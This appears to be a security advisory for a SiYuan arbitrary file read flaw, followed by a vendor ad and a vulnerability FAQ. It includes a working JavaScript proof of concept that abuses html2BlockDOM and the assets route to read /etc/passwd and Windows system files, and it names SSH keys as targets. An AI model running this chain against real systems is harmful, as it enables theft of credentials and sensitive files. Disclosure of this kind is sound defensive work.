SiYuan Vulnerable to Arbitrary File Read in Desktop Publish Service
Summary
In SiYuan, /api/lute/html2BlockDOM on the desktop copies local files pointed to by file:// links in pasted HTML into the workspace assets directory without validating paths against a sensitive-path list. Together with GET /assets/*path, which only requires authentication, a publish-service visitor can cause the desktop kernel to copy any readable sensitive file and then read it via GET, leading to exfiltration of sensitive files.
Details
1. Arbitrary local files copied into workspace
- Endpoint:
POST /api/lute/html2BlockDOM, protected only bymodel.CheckAuth; publish read-only role is not restricted. - Behavior: On desktop (
util.ContainerStd == model.Conf.System.Container), local absolute paths from<a href="file://...">in the HTML are copied to{DataDir}/assets/. - Missing check: The code does not call
util.IsSensitivePath(localPath)before copying, so any readable file (e.g./etc/passwd,~/.ssh/id_rsa) can be copied into assets.
2. Direct access to assets via GET
- Endpoint:
GET /assets/*path(kernel/server/serve.go), protected only bymodel.CheckAuth; no publish-scope or admin check. - Behavior: The path is resolved with
model.GetAssetAbsPath("assets" + path)and the file is served withhttp.ServeFile; any authenticated request (including publish visitors) can access existing asset files. - Attack chain: The visitor calls html2BlockDOM to copy a sensitive file into
data/assets/, extractsdata-href="assets/xxx"from the returned DOM, then requestsGET /assets/xxxto retrieve the file content.
PoC
// Run in the browser devtools console while on the SiYuan publish service
(async () => {
try {
// Paths below fall under util.IsSensitivePath prefixes (/etc, c:\windows\system32)
const sensitiveFiles = [
'file:///etc/passwd',
'file:///etc/group',
'file:///C:/Windows/System32/drivers/etc/hosts',
'file:///C:/Windows/System32/drivers/etc/services',
];
const dom = '<p>' + sensitiveFiles.map(f => `<a href="${f}">x</a>`).join(' ') + '</p>';
const r1 = await fetch('/api/lute/html2BlockDOM', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ dom }),
credentials: 'same-origin',
});
const { data } = await r1.json();
const paths = [...(data || '').matchAll(/data-href="(assets\/[^"]+)"/g)].map(m => m[1]);
for (const p of paths) {
const r2 = await fetch('/' + p, { credentials: 'same-origin' });
if (r2.ok) console.log('--- ' + p + ' ---\n' + (await r2.text()));
}
} catch (_) {}
})();
Impact
With only normal authentication, an attacker can bypass intended directory restrictions and read any sensitive file that the process can read on the desktop user’s machine (e.g. system account data, network configuration, credential configs), compromising confidentiality of sensitive data and the runtime environment.
| Software | From | Fixed in |
|---|---|---|
github.com/siyuan-note/siyuan/kernel
|
- | 0.0.0-20260313024916-fd6526133bb3.x |
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime
Frequently Asked Questions
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.